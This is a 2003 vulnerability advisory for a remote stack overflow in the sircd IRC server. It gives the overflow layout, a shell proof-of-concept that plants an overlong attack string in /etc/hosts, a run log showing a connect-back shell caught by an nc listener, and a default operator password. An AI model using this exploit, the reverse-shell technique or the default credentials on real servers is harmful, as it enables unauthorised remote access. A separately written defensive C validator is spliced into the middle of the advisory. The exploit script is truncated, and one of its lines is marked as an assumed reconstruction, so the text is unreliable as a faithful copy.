24th Feb 2003 [SBWID-6016]
sircd remote overflow
sircd v0.4.0, sircd-0.4.4
From Knud Erik Højgaard [[email protected]] advisory:
According to the vendor "The 'sircd' project started as an idea from
the QuakeNet IRC Network coding team to develop a completely new irc
server that had none of the problems of the original ircd, such as
instability, scalability issues, redundant, badly written code and
other nasty things."
More info is available at http://www.sircd.org.
a: Insufficient bounds checking leads to execution of arbitrary
b: Default oper account matching *!*@*
Upon checking the reverse dns of a connecting user, if the returned
value is longer than a certain length a classic stack overflow occurs.
The buffer may be constructed as such: [94 bytes of crap][EBP][EIP][400
bytes for nops and shellcode], leaving us with plenty of space both
before and after EIP to store our shellcode.
The accompanying .sh script is a silly proof of concept. Below is a
fabricated copy of a typical run:
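As an added illustration, not code from the advisory or from sircd itself: the bug class described above is a resolved hostname copied into a fixed-size stack buffer with no length check, so the length of a PTR answer decides whether the saved EBP and EIP are overwritten. The C below shows the defensive side, a validator that holds a reverse-DNS result to the RFC 1035 length and character rules and a bounded store that refuses anything that does not fit. HOSTLEN, the function names and the sample inputs are assumptions constructed for this example; the advisory only implies that about 94 bytes precede the saved EBP and gives no buffer constant.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for this example; the advisory only implies that
 * roughly 94 bytes precede the saved EBP, it does not give sircd's constant. */
#define HOSTLEN 94
#define DNS_MAX_NAME 253 /* longest legal domain name in text form (RFC 1035) */
#define DNS_MAX_LABEL 63 /* longest legal label between dots */

/* Returns 1 if name is a well-formed hostname: non-empty, within the DNS
 * length limits, labels of [A-Za-z0-9-] that neither start nor end with '-'.
 * A PTR answer carrying NOP bytes, packed addresses or over-long labels
 * fails here before it reaches any buffer. */
int hostname_is_valid(const char *name)
{
    size_t n = strlen(name);
    size_t label = 0;

    if (n == 0 || n > DNS_MAX_NAME)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '.') {
            if (label == 0 || label > DNS_MAX_LABEL || name[i - 1] == '-')
                return 0;
            label = 0;
            continue;
        }
        if (!isalnum(c) && c != '-')
            return 0;
        if (label == 0 && c == '-')
            return 0;
        label++;
    }
    /* last label: must exist, fit, and not end in '-' */
    return label > 0 && label <= DNS_MAX_LABEL && name[n - 1] != '-';
}

/* Bounded replacement for an unchecked strcpy() of a resolved name.
 * Copies into dst only when the name is valid and fits including the NUL;
 * returns 0 on success, -1 when the caller should fall back to the
 * numeric address instead. dst is always left NUL-terminated. */
int store_hostname(char *dst, size_t dstlen, const char *src)
{
    size_t n;

    if (dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (!hostname_is_valid(src))
        return -1;
    n = strlen(src);
    if (n + 1 > dstlen)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

int main(void)
{
    char host[HOSTLEN];
    char overlong[600];

    /* Constructed input mirroring the layout in the advisory: 94 filler
     * bytes, 8 bytes standing in for EBP/EIP, then a 400-byte tail. */
    memset(overlong, 'B', 94);
    memcpy(overlong + 94, "\xbf\xaf\xec\x04\xbf\xaf\xec\x04", 8);
    memset(overlong + 102, 0x90, 400);
    overlong[502] = '\0';

    printf("irc.example.net -> %d\n",
           store_hostname(host, sizeof host, "irc.example.net"));
    printf("502-byte payload -> %d\n",
           store_hostname(host, sizeof host, overlong));
    return 0;
}
```

The length check alone would have stopped the overflow; the character check is there because a daemon that later writes the name into logs, the hosts file or IRC protocol lines should never carry raw bytes from an answer it did not validate.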
$ nc -l -v -p 10000
listening on [any] 10000 ...
# ./sircd.sh 127.0.0.1
sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker>
UID check passed, backing up /etc/hosts
Now connect to the sircd from 127.0.0.1
Press a key and enter to restore /etc/hosts
Game over man, game over
$ sircd &
sircd: v0.4.0 Alpha
Zarjazz ([email protected])
$ BitchX 127.0.0.1
[snip some bitchx output]
[fi] *** Welcome to the_server
[fi] *** Resolving IP 127.0.0.1
--from here on the connection freezes.
Game over man, game over
connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)
b: type /oper bod bod bod in a connected irc-client.
# /usr/ports/irc/sircd ; sircd v0.4.0; FreeBSD 4.7-RELEASE-p2
# shellcode=connect back to port 10000 shellcode (72 bytes) by bighawk
# lousy script by knud
echo -e "\nsircd 0.4.0 proof-of-concept, usage $0 <ip-of-attacker>\n"
# assign variables
attackerip=$1   # assumed from the usage line above; the assignment is missing from this copy
filler=`perl -e 'print "B" x 94'`
returnaddress=`perl -e '$i=pack("l",0xbfafec04);print $i'`
egg=`perl -e 'print "\x90" x 328 . 
# (the egg line is cut off here in this copy of the advisory: the shellcode string and its closing quotes are missing)
attackstring=`echo "$filler$returnaddress$returnaddress$egg"` #read->
# need uid=0 to modify /etc/hosts
if [ $UID -gt 0 ];
then echo "UID = $UID, != 0, cannot continue";
exit 1
fi
echo "UID check passed, backing up /etc/hosts"
# if we end up here all is well
cp /etc/hosts /etc/hosts.$$
echo -e "$attackerip\t$attackstring\t$attackstring" > /etc/hosts
echo -e "Now connect to the sircd from $attackerip"
echo -e "Press a key and enter to restore /etc/hosts"
read restore
if [ "$restore" = "" ];
then cp /etc/hosts.$$ /etc/hosts
else cp /etc/hosts.$$ /etc/hosts
fi
echo "Game over man, game over"
The fix has been incorporated in the CVS tree as per 04/02-03